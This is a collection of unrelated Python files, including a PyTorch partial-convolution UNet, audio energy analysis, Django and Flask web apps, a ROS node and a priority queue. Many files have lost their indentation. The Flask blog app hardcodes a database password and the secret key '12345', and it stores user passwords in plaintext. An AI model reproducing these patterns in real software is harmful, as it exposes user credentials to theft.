self.conv = RGBConv(in_ch, out_ch, 5, 2, 2, bias=conv_bias)
elif sample == 'down-7':
self.conv = RGBConv(in_ch, out_ch, 7, 2, 3, bias=conv_bias)
elif sample == 'down-3':
self.conv = RGBConv(in_ch, out_ch, 3, 2, 1, bias=conv_bias)
else:
self.conv = RGBConv(in_ch, out_ch, 3, 1, 1, bias=conv_bias)
if bn:
self.bn = nn.BatchNorm2d(out_ch)
if activ == 'relu':
self.activation = nn.ReLU()
elif activ == 'leaky':
self.activation = nn.LeakyReLU(negative_slope=0.2)
def forward(self, input):
h = self.conv(input)
if hasattr(self, 'bn'):
h = self.bn(h)
if hasattr(self, 'activation'):
h = self.activation(h)
return h
class PartialConv(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, stride=1,
padding=0, dilation=1, groups=1, bias=True):
super().__init__()
self.input_conv = nn.Conv2d(in_channels, out_channels, kernel_size,
stride, padding, dilation, groups, bias)
self.mask_conv = nn.Conv2d(in_channels, out_channels, kernel_size,
stride, padding, dilation, groups, False)
self.input_conv.apply(weights_init('kaiming'))
self.in_channels = in_channels
torch.nn.init.constant_(self.mask_conv.weight, 1.0)
# mask is not updated
for param in self.mask_conv.parameters():
param.requires_grad = False
def forward(self, input, mask):
        # http://masc.cs.gmu.edu/wiki/partialconv
        # C(X) = W^T * X + b,  C(0) = b,  D(M) = 1 * M + 0 = sum(M)
        # W^T * (M .* X) / sum(M) + b = [C(M .* X) - C(0)] / D(M) + C(0)
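        # Worked illustration (assumed numbers): with the all-ones mask kernel, a window in
        # which 5 of the 9 mask entries are valid gives D(M) = 5, so the bias-free response
        # of that window is divided by 5 below; windows with no valid entries are zeroed and
        # their entry in the new mask is set to 0.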
#print("mask size: ", mask.size())
mask = mask[:, 1:2, :, :]
#print("mask size: ", mask.size())
mask = mask.repeat(1, self.in_channels, 1, 1)
#print("mask size: ", mask.size())
#print("input size: ", input.size())
output = self.input_conv(input * mask)
if self.input_conv.bias is not None:
output_bias = self.input_conv.bias.view(1, -1, 1, 1).expand_as(
output)
else:
output_bias = torch.zeros_like(output)
with torch.no_grad():
output_mask = self.mask_conv(mask)
no_update_holes = output_mask == 0
mask_sum = output_mask.masked_fill_(no_update_holes, 1.0)
output_pre = (output - output_bias) / mask_sum + output_bias
output = output_pre.masked_fill_(no_update_holes, 0.0)
new_mask = torch.ones_like(output)
new_mask = new_mask.masked_fill_(no_update_holes, 0.0)
return output, new_mask
class PCBActiv(nn.Module):
def __init__(self, in_ch, out_ch, bn=True, sample='none-3', activ='relu',
conv_bias=False):
super().__init__()
if sample == 'down-5':
self.conv = PartialConv(in_ch, out_ch, 5, 2, 2, bias=conv_bias)
elif sample == 'down-7':
self.conv = PartialConv(in_ch, out_ch, 7, 2, 3, bias=conv_bias)
elif sample == 'down-3':
self.conv = PartialConv(in_ch, out_ch, 3, 2, 1, bias=conv_bias)
else:
self.conv = PartialConv(in_ch, out_ch, 3, 1, 1, bias=conv_bias)
if bn:
self.bn = nn.BatchNorm2d(out_ch)
if activ == 'relu':
self.activation = nn.ReLU()
elif activ == 'leaky':
self.activation = nn.LeakyReLU(negative_slope=0.2)
def forward(self, input, input_mask):
h, h_mask = self.conv(input, input_mask)
if hasattr(self, 'bn'):
h = self.bn(h)
if hasattr(self, 'activation'):
h = self.activation(h)
return h, h_mask
class PConvUNet(nn.Module):
def __init__(self, layer_size=6, upsampling_mode='nearest'):
super().__init__()
self.freeze_enc_bn = False
self.upsampling_mode = upsampling_mode
self.layer_size = layer_size
self.d_enc_1 = PCBActiv(4, 64, bn=False, sample='down-7')
self.rgb_enc_1 = RGBActiv(3, 64, bn=False, sample='down-7')
self.d_enc_2 = PCBActiv(128, 128, sample='down-5')
self.rgb_enc_2 = RGBActiv(64, 128, bn=False, sample='down-5')
self.d_enc_3 = PCBActiv(256, 256, sample='down-5')
self.rgb_enc_3 = RGBActiv(128, 256, bn=False, sample='down-5')
self.d_enc_4 = PCBActiv(512, 256, sample='down-3')
self.rgb_enc_4 = RGBActiv(256, 256, bn=False, sample='down-3')
self.d_enc_5 = PCBActiv(512, 256, sample='down-3')
self.rgb_enc_5 = RGBActiv(256, 256, bn=False, sample='down-3')
self.d_enc_6 = PCBActiv(512, 256, sample='down-3')
self.rgb_enc_6 = RGBActiv(256, 256, bn=False, sample='down-3')
# takes in [rgb_enc_6, d_enc_6]
self.d_dec_6 = PCBActiv(256 + 256, 256, activ='leaky')
# takes in [rgb_enc_6]
self.rgb_dec_6 = RGBActiv(256, 256, activ='leaky')
# takes in [rgb_enc_5, d_enc_5, rgb_dec_6, d_dec_6]
self.d_dec_5 = PCBActiv(256 + 256 + 256 + 256, 256, activ='leaky')
# takes in [rgb_enc_5, rgb_dec_6]
self.rgb_dec_5 = RGBActiv(256 + 256, 256, activ='leaky')
# takes in [rgb_enc_4, d_enc_4, rgb_dec_5, d_dec_5]
self.d_dec_4 = PCBActiv(256 + 256 + 256 + 256, 256, activ='leaky')
self.rgb_dec_4 = RGBActiv(256 + 256, 256, activ='leaky')
# takes in [rgb_enc_3, d_enc_3, rgb_dec_4, d_dec_4]
self.d_dec_3 = PCBActiv(256 + 256 + 256 + 256, 256, activ='leaky')
self.rgb_dec_3 = RGBActiv(256 + 256, 256, activ='leaky')
# takes in [rgb_enc_2, d_enc_2, rgb_dec_3, d_dec_3]
self.d_dec_2 = PCBActiv(128 + 128 + 256 + 256, 128, activ='leaky')
self.rgb_dec_2 = RGBActiv(128 + 256, 128, activ='leaky')
# takes in [rgb_enc_1, d_enc_1, rgb_dec_2, d_dec_2]
self.d_dec_1 = PCBActiv(64 + 64 + 128 + 128, 64, bn=False, activ=None, conv_bias=True)
# technically just a dummy set of weights
self.rgb_dec_1 = RGBActiv(64 + 128, 64, bn=False, activ=None, conv_bias=True)
# takes in [rgb, masked_depth, rgb_dec_1, d_dec_1]
self.d_dec_0 = PCBActiv(64 + 64 + 4, 1, bn=False, activ=None, conv_bias=True)
def forward(self, rgb, masked_depth, input_mask):
d_dict = {} # for the output of the depth layers
rgb_dict = {} # for the output of the RGB layers
mask_dict = {} # for the mask outputs of the depth layers
rgb_dict['e_0'], d_dict['e_0'], mask_dict['e_0'] = rgb, masked_depth, input_mask
#print(rgb.size())
#print(masked_depth.size())
enc_key_prev = 'e_0'
for i in range(1, self.layer_size + 1):
enc_key = 'e_{:d}'.format(i)
# first, run it through the rgb convolutional layer
l_key = 'rgb_enc_{:d}'.format(i)
#print("Giving layer {} input of size {}".format(l_key, rgb_dict[enc_key_prev].size()))
rgb_dict[enc_key] = getattr(self, l_key)(rgb_dict[enc_key_prev])
l_key = 'd_enc_{:d}'.format(i)
#print("Giving layer {} input of size {}".format(l_key, torch.cat((d_dict[enc_key_prev], rgb_dict[enc_key_prev]), 1).size()))
d_dict[enc_key], mask_dict[enc_key] = getattr(self, l_key)(
torch.cat((d_dict[enc_key_prev], rgb_dict[enc_key_prev]), 1),
mask_dict[enc_key_prev])
enc_key_prev = enc_key
enc_key = 'e_{:d}'.format(self.layer_size)
h_rgb = getattr(self, 'rgb_dec_{:d}'.format(self.layer_size))(
rgb_dict[enc_key]
)
h_depth, h_mask = getattr(self, 'd_dec_{:d}'.format(self.layer_size))(
torch.cat((d_dict[enc_key], rgb_dict[enc_key]), 1),
mask_dict[enc_key]
)
for i in range(self.layer_size - 1, 0, -1):
enc_key = 'e_{:d}'.format(i)
h_rgb = F.interpolate(h_rgb, scale_factor=2, mode=self.upsampling_mode)
h_depth = F.interpolate(h_depth, scale_factor=2, mode=self.upsampling_mode)
h_mask = F.interpolate(h_mask, scale_factor=2, mode='nearest')
l_key = 'd_dec_{:d}'.format(i)
#print("Giving layer {} input of size {}".format(l_key, torch.cat((rgb_dict[enc_key], h_rgb, d_dict[enc_key], h_depth), 1).size()))
h_depth, h_mask = getattr(self, l_key)(
torch.cat((rgb_dict[enc_key],
h_rgb,
d_dict[enc_key],
h_depth), 1),
torch.cat((h_mask, mask_dict[enc_key]), 1))
l_key = 'rgb_dec_{:d}'.format(i)
#print("Giving layer {} input of size {}".format(l_key, torch.cat((rgb_dict[enc_key], h_rgb), 1).size()))
h_rgb = getattr(self, l_key)(
torch.cat((rgb_dict[enc_key], h_rgb), 1))
h_rgb = F.interpolate(h_rgb, scale_factor=2, mode=self.upsampling_mode)
h_depth = F.interpolate(h_depth, scale_factor=2, mode=self.upsampling_mode)
h_mask = F.interpolate(h_mask, scale_factor=2, mode='nearest')
h_depth, h_mask = self.d_dec_0(
torch.cat((rgb,
h_rgb,
masked_depth,
h_depth), 1),
h_mask
)
#print("done")
return h_depth, h_mask
def train(self, mode=True):
"""
Override the default train() to freeze the BN parameters
"""
super().train(mode)
if self.freeze_enc_bn:
for name, module in self.named_modules():
if isinstance(module, nn.BatchNorm2d) and 'enc' in name:
module.eval()
if __name__ == '__main__':
size = (1, 3, 5, 5)
input = torch.ones(size)
input_mask = torch.ones(size)
input_mask[:, :, 2:, :][:, :, :, 2:] = 0
conv = PartialConv(3, 3, 3, 1, 1)
l1 = nn.L1Loss()
input.requires_grad = True
output, output_mask = conv(input, input_mask)
loss = l1(output, torch.randn(1, 3, 5, 5))
loss.backward()
assert (torch.sum(input.grad != input.grad).item() == 0)
assert (torch.sum(torch.isnan(conv.input_conv.weight.grad)).item() == 0)
assert (torch.sum(torch.isnan(conv.input_conv.bias.grad)).item() == 0)
# model = PConvUNet()
# output, output_mask = model(input, input_mask)
|
from scipy.io import wavfile
import math
import matplotlib.pyplot as plt
import numpy as np
def moving_average(interval, window_size):
window = np.ones(int(window_size)) / float(window_size)
return np.convolve(interval, window, 'same')
audio_file = r'F:\Projects\Active Projects\Project Intern_IITB\Vowel Evaluation CH V2\Analyze\Vowel_Evaluation_V2_I1\6.wav'
window_dur = 30
hop_dur = 5
fs, data = wavfile.read(audio_file) # Reading data from wav file in an array
data = data / float(2 ** 15) # Normalizing it to [-1,1] range from [-2^15,2^15]
window_size = int(window_dur * fs * 0.001) # Converting window length to samples
hop_size = int(hop_dur * fs * 0.001) # Converting hop length to samples
window_type = np.hanning(window_size) # Window type: Hanning (by default)
no_frames = int(math.ceil(len(data) / (float(hop_size)))) # Determining the number of frames
zero_array = np.zeros(window_size) # Appending appropriate number of zeros
data = np.concatenate((data, zero_array))
x_values = np.arange(0, len(data), 1) / float(fs)
gamma = []
sums = 0
auto = []
for i in range(no_frames):
frame = data[i * hop_size:i * hop_size + window_size] * window_type
# frame_1 = frame.tolist()
# frame_1.reverse()
# for h in range(0,len(frame)-1):
# for t in range(0,len(frame)-h):
# sums = sums + frame[t+h]*frame[t]
# gamma.append(sums/len(frame))
# sums = 0
auto.append(max(np.correlate(frame,frame)))
gamma[:] = []
max_st_energy = max(auto) # Maximum value of Short term energy curve
for i in range(no_frames):
auto[i] = auto[i] / max_st_energy # Normalizing the curve
seg = int(no_frames/200)
rem = no_frames%200
print(seg, rem, no_frames)
print(auto)
for i in range(0, seg - 1):
    print(i * 200, (i + 1) * 200)
    maxi = max(auto[i * 200:(i + 1) * 200])
    for j in range(i * 200, (i + 1) * 200):
        auto[j] = auto[j] / maxi
print(auto)
# for i in range(no_frames):
st_energy = []
for i in range(no_frames):
frame = data[i * hop_size:i * hop_size + window_size] * window_type
st_energy.append(sum(frame ** 2))
# gamma = []
# sum = 0
# for h in range(0,len(data)-1):
# for t in range(0, len(data) - h):
# sum = sum + data[t+h]*data[t]
# gamma.append(sum)
# # print len(gamma)
# sum = 0
plt.subplot(311)
plt.plot(data)
plt.subplot(312)
plt.plot(auto)
plt.subplot(313)
plt.plot(st_energy)
plt.show()
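# Hedged note (illustration only): the commented-out loops above compute the short-time
# autocorrelation explicitly; the same quantity can be obtained per frame with np.correlate
# in 'full' mode, keeping only the non-negative lags, e.g. for one frame:
#   ac = np.correlate(frame, frame, mode='full')[len(frame) - 1:]  # lags 0..N-1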
|
import os
env = Environment(ENV = os.environ)
env.Program("trafficSim",Glob("*.cc") + Glob("*/*.cc"), CCFLAGS="-g -O0 -std=c++11")
|
from django.shortcuts import render
from django.http import HttpResponse
def home(request):
    # return HttpResponse("Hello world")
    return render(request, 'home.html', {'name': 'someone'})
def add(request):
    no1 = int(request.POST['no1'])
    no2 = int(request.POST['no2'])
    result = no1 + no2
    return render(request, 'result.html', {'name': 'someone', 'result': result})
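# Hedged wiring sketch (module path and names are assumptions, illustration only):
# these two views are typically exposed through the project's urls.py, e.g.
#
#   from django.urls import path
#   from . import views
#
#   urlpatterns = [
#       path('', views.home, name='home'),
#       path('add/', views.add, name='add'),
#   ]
#
# home.html would then POST no1 and no2 to the 'add' URL.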
|
import autodisc as ad
import numpy as np
import os
import pickle
class Classifier:
@staticmethod
def default_config():
return ad.Config()
def __init__(self, config=None, **kwargs):
self.config = ad.config.set_default_config(kwargs, config, self.__class__.default_config())
def calc(self, observations, statistics):
pass
class Representation:
@staticmethod
def default_config():
return ad.Config()
def __init__(self, config=None, **kwargs):
self.config = ad.config.set_default_config(kwargs, config, self.__class__.default_config())
def calc(self, observations, statistics):
pass
def calc_distance(self, representation1, representation2):
'''
Standard Euclidean distance between representation vectors.
'''
if len(representation1) == 0 or len(representation2) == 0:
return np.array([])
diff = np.array(representation1) - np.array(representation2)
if np.ndim(diff) == 1:
dist = np.linalg.norm(diff)
else:
dist = np.linalg.norm(diff, axis=1)
return dist
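    # Illustrative behaviour: calc_distance([0, 0], [3, 4]) -> 5.0, while 2-D inputs such as
    # [[0, 0], [1, 1]] vs [[3, 4], [1, 1]] give a per-row distance array [5., 0.].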
class System:
@staticmethod
def default_system_parameters():
return ad.Config()
@staticmethod
def default_config():
return ad.Config()
def default_statistics(self):
'''
        The default statistics associated with a system; they are loaded if the user does not specify any statistics.
:return: List with Statistics.
'''
return []
def __init__(self, statistics=None, system_parameters=None, config=None, **kwargs):
'''
Initialize a system.
        :param system_parameters: System parameters in the form of a dictionary.
:param statistics: List of statistics.
'''
self.system_parameters = ad.config.set_default_config(system_parameters, self.__class__.default_system_parameters())
self.config = ad.config.set_default_config(kwargs, config, self.__class__.default_config())
self.run_parameters = None
if statistics is None:
self.statistics = self.default_statistics()
elif not isinstance(statistics, list):
# statistics should be a list
self.statistics = [statistics]
else:
self.statistics = statistics
def run(self, run_parameters=None, stop_conditions=100, observation_filter=None):
'''
Runs the system for the given parameters.
:param run_parameters
        :param stop_conditions: List with conditions by which the run stops. If any of the conditions is fulfilled, the run stops.
Possible conditions: int - maximum number of steps
function handle - the function is called and a bool is expected. Function parameters: system, step, state, statistics
'''
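        # A stop condition can also be any callable with the signature described above,
        # e.g. (illustrative only):
        #   def stop_after_50_steps(system, step, state, statistics):
        #       return step >= 50
        #   system.run(run_parameters, stop_conditions=[100, stop_after_50_steps])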
self.run_parameters = run_parameters
if not isinstance(stop_conditions, list):
stop_conditions = [stop_conditions]
max_number_of_steps = float('inf')
stop_condition_functions = []
for stop_condition in stop_conditions:
if isinstance(stop_condition, int):
max_number_of_steps = min(stop_condition, max_number_of_steps)
else:
stop_condition_functions.append(stop_condition)
states = []
step = 0
        # initialize system
state = self.init_run(run_parameters)
for stat in self.statistics:
stat.calc_after_init(self, state)
states.append(state)
        # simulate the system until a stop_condition is fulfilled
while step < max_number_of_steps-1 and np.all([not f(self, step, state, self.statistics) for f in stop_condition_functions]):
step += 1
state = self.step(step)
states.append(state)
for stat in self.statistics:
stat.calc_after_step(self, state, step)
# end system
self.stop()
for stat in self.statistics:
stat.calc_after_stop(self)
# calculate the final statistics over all observations
for stat in self.statistics:
stat.calc_after_run(self, states)
observations = ad.helper.data.AttrDict()
observations.timepoints = list(range(step+1))
observations.states = states
# collect statistics data
statistics_data = dict()
for stat in self.statistics:
statistics_data = {**stat.data, **statistics_data}
statistics_data = ad.helper.data.AttrDict(statistics_data)
return observations, statistics_data
def init_run(self, run_parameters):
pass
def step(self, step_idx):
pass
def stop(self):
pass
class SystemStatistic:
@staticmethod
def default_config():
return ad.Config()
def __init__(self, system=None, config=None, **kwargs):
self.config = ad.config.set_default_config(kwargs, config, self.__class__.default_config())
self.data = ad.helper.data.AttrDict()
def reset(self):
# set all statistics to zero
for key in self.data.keys():
self.data[key] = []
def calc_after_init(self, system, obs):
pass
def calc_after_step(self, system, obs, step):
pass
def calc_after_stop(self, system):
pass
def calc_after_run(self, system, all_obs):
pass
class Explorer:
'''
Base class for exploration experiments.
    Allows saving and loading exploration results.
'''
@staticmethod
def default_config():
default_config = ad.Config()
default_config.id = None
default_config.descr = None
default_config.seed = None
return default_config
def __init__(self, system, datahandler=None, config=None, **kwargs):
self.system = system
# if experiment_stats is None:
# self.experiment_stats = []
# if not isinstance(experiment_stats, list):
# self.experiment_stats = [experiment_stats]
# else:
# self.experiment_stats = experiment_stats
if datahandler is None:
self.data = ad.ExplorationDataHandler.create(directory='./results')
else:
self.data = datahandler
# set config
self.config = ad.config.set_default_config(kwargs, config, self.__class__.default_config())
# save some of the initial parameters in the data as documentation and to allow replication
exploration_data = ad.DataEntry()
exploration_data.id = self.config.id
exploration_data.descr = self.config.descr
exploration_data.seed = self.config.seed
exploration_data.system_parameters = self.system.system_parameters
exploration_data.system_name = self.system.__class__.__name__
exploration_data.software_version = ad.__version__
self.data.add_exploration_data(exploration_data)
        if self.config.seed is not None:
            # seed the generator so that runs with the same seed are reproducible
            self.random = np.random.RandomState(self.config.seed)
        else:
            self.random = np.random.RandomState()
def run(self):
pass
def save(self):
# save experiment data
self.data.save()
if 'directory' in self.data.config:
self.save_explorer_obj(directory=self.data.config.directory)
else:
raise NotImplementedError('Saving the explorer object for non file based databases is not implemented yet!')
def save_explorer_obj(self, directory=None):
'''
Saves the explorer via pickle to the given directory.
Note, that this does not save the data and the configuration.
Use explorer.save() to save the data and the explorer or explorer.data.save() to only save the data.
'''
if directory is None:
directory = self.data.config.directory
if not os.path.exists(directory):
os.makedirs(directory)
filepath = os.path.join(directory, 'explorer.pickle')
file = open(filepath, 'wb')
# do not pickle the data, but save it in extra files
tmp_data = self.data
self.data = None
        # do not pickle the configuration, because it might contain lambda functions or other elements that cannot be pickled
        # we assume that the configuration is saved separately for each experiment anyway and that the user can load it from there
tmp_config = self.config
self.config = None
# store configuration of the datahandler, so that it can be retrieved
self.datahandler_config = tmp_data.config
# pickle exploration object
pickle.dump(self, file)
# attach results and config again to the exploration object
self.data = tmp_data
del self.datahandler_config
self.config = tmp_config
def calc_run_statistics(self, statistics, is_rerun=False, verbose=False):
'''Calculates the given statistics for all run data elements.'''
if not isinstance(statistics, list):
statistics = [statistics]
if is_rerun:
#TODO: implement rerun
raise NotImplementedError('Rerunning the system for the calculation of extra statistics is not implemented yet!')
system = self.system
if verbose:
counter = 0
ad.gui.print_progress_bar(counter, len(self.data), 'Runs: ')
for run_data in self.data:
if run_data.observations is None:
[obs,_] = system.run(run_parameters=run_data.run_parameters,
stop_conditions=self.config.stop_conditions)
all_obs = obs.states
else:
all_obs = run_data.observations.states
system.run_parameters = {**run_data.run_parameters, **self.system.system_parameters}
for stat in statistics:
stat.reset()
stat.calc_after_run(system, all_obs)
# collect statistics data
statistics_data = dict()
for stat in statistics:
statistics_data = {**stat.data, **statistics_data}
statistics_data = ad.helper.data.AttrDict(statistics_data)
new_stats = {**statistics_data, **run_data.statistics}
self.data.add_run_data(run_data.id, statistics=new_stats)
if verbose:
counter += 1
ad.gui.print_progress_bar(counter, len(self.data), 'Runs: ')
if counter == len(self.data):
print('')
@staticmethod
def load_explorer(directory='./results', load_data=True, run_ids=None, load_observations=None, verbose=False):
explorer_filepath = os.path.join(directory, 'explorer.pickle')
with open(explorer_filepath, "rb") as explorer_file:
explorer = pickle.load(explorer_file)
if load_data:
explorer.data = ad.ExplorationDataHandler.create(config=explorer.datahandler_config, directory=directory)
explorer.data.load(run_ids=run_ids, load_observations=load_observations, verbose=verbose)
del explorer.datahandler_config
return explorer
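    # Typical round trip (illustrative; assumes the default file-based data handler):
    #   explorer.save()                                # writes the data and explorer.pickle
    #   explorer = Explorer.load_explorer('./results') # restores the object and reloads its data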
|
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import re
import numpy as np
import os
import subprocess
import sys
def compare(repeat, group, step):
    # wrap in list(...) so the technique names can be iterated repeatedly (filter() is lazy in Python 3)
    techniques = list(filter(lambda x: x not in ["utils"], [i.split(".")[0] for i in os.listdir("./techniques")]))
    tasks = {"cpu_bound": 100000, "io_bound": "https://gitlabe1.ext.net.nokia.com"}
    x = [step * (i + 1) for i in range(group)]
    for task_type, task in tasks.items():
        y = {}
        for t in techniques:
            y[t] = np.zeros((repeat, group))
        for r in range(repeat):
            for g in range(1, group + 1):
                for t in techniques:
                    print("task_type: %s; repeat: %d; group: %d; technique:%s" % (task_type, r, g, t))
                    res = subprocess.check_output("python ./techniques/%s.py %s %s" % (t, task, g), shell=True)
                    y[t][r][g-1] = float(res.strip())
for t in techniques:
np.savetxt("./result/%s_%s_data.txt" % (task_type, t), y[t])
y[t] = y[t].sum(0)/repeat
d = 2000
xlabel = 'num of tasks'
ylabel = 'average time in seconds'
plt.figure(1)
styles= ["g^-", "ro-", "b+-", "y>-", "k<-"]
for t in techniques:
plt.plot(x, y[t], styles.pop(0), label="%s technique"%t)
plt.legend(loc='best')
plt.xlabel(xlabel)
plt.ylabel(ylabel)
plt.savefig('./result/compare_%s.png' % task_type, dpi=d)
plt.close()
if __name__ == "__main__":
repeat = int(sys.argv[1]) if len(sys.argv) > 1 else 10
group = int(sys.argv[2]) if len(sys.argv) > 2 else 10
step = int(sys.argv[3]) if len(sys.argv) > 3 else 1000
compare(repeat, group, step)
|
#!/usr/bin/env python
import rospy
from std_msgs.msg import String, UInt32
from gps_agent_pkg.msg import LaikaCommand, LaikaState, LaikaStateArray, LaikaAction
import numpy as np
def state_callback(msg):
rospy.loginfo(msg)
def init_node():
# Initialize node
rospy.init_node('laika_control', anonymous=True)
rate = rospy.Rate(10) # 10hz
# Initialize publishers and subscribers
pub_cmd = rospy.Publisher('cmd', LaikaCommand, queue_size=1)
pub_act = rospy.Publisher('action', LaikaAction, queue_size=1)
sub = rospy.Subscriber('state', LaikaStateArray, state_callback)
return pub_cmd, pub_act, sub
if __name__ == '__main__':
pub_cmd, pub_act, sub = init_node()
counter = 0
cmd_msg = LaikaCommand()
act_msg = LaikaAction()
# state_msg = UInt32()
rate = rospy.Rate(10) # 10hz
while not rospy.is_shutdown():
cmd_msg.header.seq = counter
cmd_msg.header.stamp = rospy.Time.now()
act_msg.header.seq = counter
act_msg.header.stamp = rospy.Time.now()
act_msg.actions = np.random.uniform(5,15,44)
if counter % 100 == 0:
cmd_msg.cmd = 'reset'
else:
cmd_msg.cmd = 'step'
pub_cmd.publish(cmd_msg)
rospy.loginfo(cmd_msg)
pub_act.publish(act_msg)
rospy.loginfo(act_msg)
counter += 1
rate.sleep()
|
from rest_framework import serializers
from movies_app.model.users import User
from movies_app import models
class LoginSerializer(serializers.ModelSerializer):
class Meta:
model = models.User
fields = "__all__"
|
import webapp2
from webapp2_extras import jinja2
from google.appengine.api import users
from google.appengine.ext import ndb
from model.libroCientifico import libroCientifico
class EliminarlibroCientificoHandler(webapp2.RequestHandler):
def get(self):
user = users.get_current_user()
if user:
            try:
                id_libroCientifico = self.request.GET["id_libroCientifico"]
            except KeyError:
                id_libroCientifico = "ERROR"
libroCientifico = ndb.Key(urlsafe=id_libroCientifico).get()
sust = {
"libroCientifico" : libroCientifico
}
jinja = jinja2.get_jinja2(app=self.app)
self.response.write(jinja.render_template("librosCientificos/eliminarLibroCientifico.html", **sust))
else:
self.redirect("/")
return
def post(self):
user = users.get_current_user()
if user:
id_libroCientifico = self.request.get("edIdLibroCientifico", "ERROR")
libroCientifico = ndb.Key(urlsafe=id_libroCientifico).get()
url = "/listarLibrosCientificos"
mensaje = "El libro: "+libroCientifico.titulo+" ha sido eliminado con exito"
libroCientifico.key.delete()
sust = {
"mensaje": mensaje,
"url": url
}
jinja = jinja2.get_jinja2(app=self.app)
self.response.write(jinja.render_template("mensajeConfirmacion.html", **sust))
else:
self.redirect("/")
return
app = webapp2.WSGIApplication([
('/eliminarLibroCientifico', EliminarlibroCientificoHandler),
], debug=True)
|
from urllib.request import urlopen  # in Python 3, urlopen lives in urllib.request
'''
This is a test of opening and reading from files.
'''
f = open('TestFile.txt', 'r+')
for l in f:
    print(l)
f.write('I just added this line.')
f.seek(0)  # rewind so the second pass re-reads the file, including the appended line
for l in f:
    print(l)
f.close()
urlopen('https://www.google.com')
|
from flask import Flask, request, redirect, render_template, session, flash
from flask_sqlalchemy import SQLAlchemy
import cgi
import os
app = Flask(__name__)
app.config['DEBUG'] = True
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://blogz:chedder@localhost:8889/blogz'
app.config['SQLALCHEMY_ECHO'] = True
db = SQLAlchemy(app)
app.secret_key = "12345"
class Blog(db.Model):
id = db.Column(db.Integer, primary_key=True)
title = db.Column(db.String(120))
body = db.Column(db.String(120))
owner_id = db.Column(db.Integer, db.ForeignKey('user.id'))
def __init__(self, title, body, owner):
self.title = title
self.body = body
self.owner = owner
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(120), unique=True)
password = db.Column(db.String(120))
blogs = db.relationship('Blog', backref='owner')
def __init__(self, name, password):
self.name = name
self.password = password
@app.before_request
def require_login():
allowed_routes = ['index','home', 'UserBlog', 'allposts', 'signup', 'login','blogpost']
if request.endpoint not in allowed_routes and 'name' not in session:
return redirect('/login')
@app.route('/UserBlog', methods=['GET'])
def blog():
name = request.args['name']
blogset = Blog.query.filter_by(owner_id=name)
return render_template('blog.html', blogset=blogset )
@app.route('/allposts', methods=['GET'])
def allposts():
blogset = reversed(Blog.query.all())
return render_template('blog.html', blogset=blogset )
@app.route('/signup', methods=['GET', 'POST'])
def signup():
if request.method == 'POST':
name = request.form['name']
password = request.form['password']
verify = request.form['verify']
error = False
if name.strip() == '':
flash("cannot be empty",'error')
error = True
if len(name)>=120 or len(name)<=3:
flash("That's not a valid user name",'error')
error = True
if len(password)<=3 or len(password)>=120:
flash("That's not a valid password",'error')
error = True
if password != verify:
flash("Passwords don't match",'error')
error = True
if error is False:
existing_user = User.query.filter_by(name=name).first()
if not existing_user:
new_user = User(name, password)
db.session.add(new_user)
db.session.commit()
session['name'] = name
return redirect('/newpost')
else:
flash('must be new user', 'error')
return render_template('signup.html')
return render_template('signup.html')
@app.route('/login', methods=['GET', 'POST'])
def login():
if request.method == 'POST':
name = request.form['name']
password = request.form['password']
user = User.query.filter_by(name=name).first()
if user and user.password == password:
session['name'] = name
flash('Logged In')
return redirect('/home')
else:
flash('User password is incorrect or user does not exist', 'error')
return render_template('login.html')
@app.route('/')
def home():
return redirect('/home')
@app.route('/home', methods=['GET','POST'])
def index():
user_list = (reversed(User.query.all()))
return render_template('index.html', user_list=user_list )
@app.route('/logout')
def logout():
del session['name']
return redirect('/home')
@app.route('/newpost', methods=['POST', 'GET'])
def newblog():
owner = User.query.filter_by(name=session['name']).first()
title = ''
body = ''
title_error = ''
body_error = ''
error = False
if request.method == 'POST':
title = request.form['title']
body = request.form['body']
if title.strip() == '':
title_error = "cannot be empty"
error = True
if body.strip() == '':
body_error = "cannot be empty"
error = True
if error is False:
blog = Blog(title, body, owner)
db.session.add(blog)
db.session.commit()
blog_id = str(blog.id)
return redirect('/blogpost?id='+blog_id)
return render_template('newpost.html', title=title,
body=body, title_error=title_error, body_error=body_error)
@app.route('/blogpost', methods=['GET'])
def blogpost():
id = request.args['id']
    blog = Blog.query.filter_by(id=id).first()
return render_template('blogpost.html', blog=blog)
if __name__ == '__main__':
app.run()
|
# -*- coding: utf-8 -*-
"""
Generates input files for the finite element program FEM_iso
for the Brazilian test, using 2 symmetries in the model.
@author: Nicolas Guarin-Zapata
@date: Mayo 18, 2017
"""
from __future__ import division, print_function
import numpy as np
import meshio
import solidspy.preprocesor as msh
points, cells, point_data, cell_data, field_data = \
meshio.read("Prueba_brasilera.msh")
nodes_array = msh.node_writer(points, point_data)
nf , els_array = msh.ele_writer(cells, cell_data, "triangle", 1000 , 3 , 0 , 0)
nodes_array = msh.boundary_conditions(cells, cell_data, 100, nodes_array, -1, 0)
nodes_array = msh.boundary_conditions(cells, cell_data, 200, nodes_array, 0, -1)
np.savetxt("eles.txt" , els_array , fmt="%d")
np.savetxt("nodes.txt", nodes_array , fmt=("%d", "%.4f", "%.4f", "%d", "%d"))
|
#!/usr/bin/env python3
# Min priority queue implementation using a binary heap
class PQueue():
    def __init__(self, elements=None):
        # The number of elements currently inside the heap
        self.size = 0
        # A dynamic list to track the elements inside the heap
        # (instance attribute, so separate queues never share storage)
        self.heap = []
        if elements is not None:
            self.heapify(elements)
def heapify(self, elements):
self.size = len(elements)
self.heap = list(elements)
# Heapify process, O(n)
for i in range(max(0, (self.size//2)-1), -1, -1):
self._sink(i)
def clear(self):
self.heap = []
self.size = 0
def is_empty(self):
return self.size == 0
# Return the size of the heap
def __len__(self):
return self.size
# Returns the value of the element with the lowest
# priority in this priority queue. If the priority
# queue is empty null is returned
def peek(self):
if self.is_empty(): return None
return self.heap[0]
# Removes the root of the heap, O(log(n))
def poll(self):
return self._remove_at(0)
# Test if an element is in heap, O(n)
def __contains__(self, elem):
# Linear scan to check containment, O(n)
for i in range(self.size):
if self.heap[i] == elem:
return True
return False
# Adds an element to the priority queue, the
# element must not be null, O(log(n))
def add(self, elem):
        if elem is None: raise ValueError("Element cannot be None")
self.heap.append(elem)
self._swim(self.size)
self.size += 1
# Removes a particular element in the heap, O(n)
def remove(self, elem):
        if elem is None: return False
# Linear removal via search, O(n)
for i in range(self.size):
if elem == self.heap[i]:
self._remove_at(i)
return True
return False
# Tests if the value of node i <= node j
# This method assumes i & j are valid indices, O(1)
def _less(self, i, j):
